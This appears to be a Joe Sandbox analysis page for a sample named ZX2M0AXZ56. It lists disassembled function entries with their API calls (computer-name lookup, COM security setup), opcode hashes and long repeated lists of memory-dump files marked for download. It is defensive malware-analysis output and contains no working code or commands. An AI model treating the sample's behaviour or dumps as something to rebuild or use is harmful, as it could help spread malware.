Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: ;87>
API String ID: 2904949787-2104535307
Opcode ID: 5478ef7aafba6170909120c87e3116d163d36667f48b76bb8387532618e3bd1a
Instruction ID: c862fbd13ef4e6f9cee61cde70790ce1e30824ad1029295e524e4dfc77b144ef
Opcode Fuzzy Hash: 5478ef7aafba6170909120c87e3116d163d36667f48b76bb8387532618e3bd1a
Instruction Fuzzy Hash: AA2128B05047428FDB228F39D860737BFE1AF57301F18869BD4D68B396D6389842DB55

Function 004BEF53 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 004BF09C

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 39885b9ed1dad805e3648746a974894a2c37434de29cc2e3c784b0f288bed26c
Instruction ID: f474e4310924c925aafff93ceffb3f76d49f6f958e695d3c82bdb266580a3b41
Opcode Fuzzy Hash: 39885b9ed1dad805e3648746a974894a2c37434de29cc2e3c784b0f288bed26c
Instruction Fuzzy Hash: F541C8B4C10B40AFD370EF39994B7137EB8AB05250F504B1EF9EA866D4E231A4198BD7

Function 004DD7BD Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000005,?,?), ref: 004DDD03

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 9102c8a6178a0e308f35f2635c14df3e974f0d088f42e3b9e06d3b40335b4fd2
Instruction ID: dcf86b7e599393755a3e04437d579d221ecd9a40e34c3b56bacf3a16d6bf0ced
Opcode Fuzzy Hash: 9102c8a6178a0e308f35f2635c14df3e974f0d088f42e3b9e06d3b40335b4fd2
Instruction Fuzzy Hash: 6B21A4705047918BD7268B24C460732BBE1BF5B704F1895DFD4D38B786CA78A446C766

Function 004EE0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 004EE0E0

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cd170c2ac302403ad436053d28137f2b40c72b8809006c3b51b778704ead548e
Instruction ID: 20cd6967ff0c1c912bc18a4c63b1a8262a2adef5423f1c0bcc762f1d819b0b17
Opcode Fuzzy Hash: cd170c2ac302403ad436053d28137f2b40c72b8809006c3b51b778704ead548e
Instruction Fuzzy Hash: 7FF0A072824261FBC2102F2ABD05A6B3AA4AFC2762F05043AF40056121DA39EC26C69A

Function 004BEC77 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004BECA3

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 34ef016cf832fae1ea6d31b221330d0e40f226b367317a3223b666ac9cc91edd
Instruction ID: 2326b8db873de5634fcee3b5446da453c001d436d60ff20f9febe8baeb389989
Opcode Fuzzy Hash: 34ef016cf832fae1ea6d31b221330d0e40f226b367317a3223b666ac9cc91edd
Instruction Fuzzy Hash: B8E092343EA742BAF63D82149CA3F2622069B42F28E305B18B3313D7D4CED03112814D

Function 004E0B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004E0B74

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
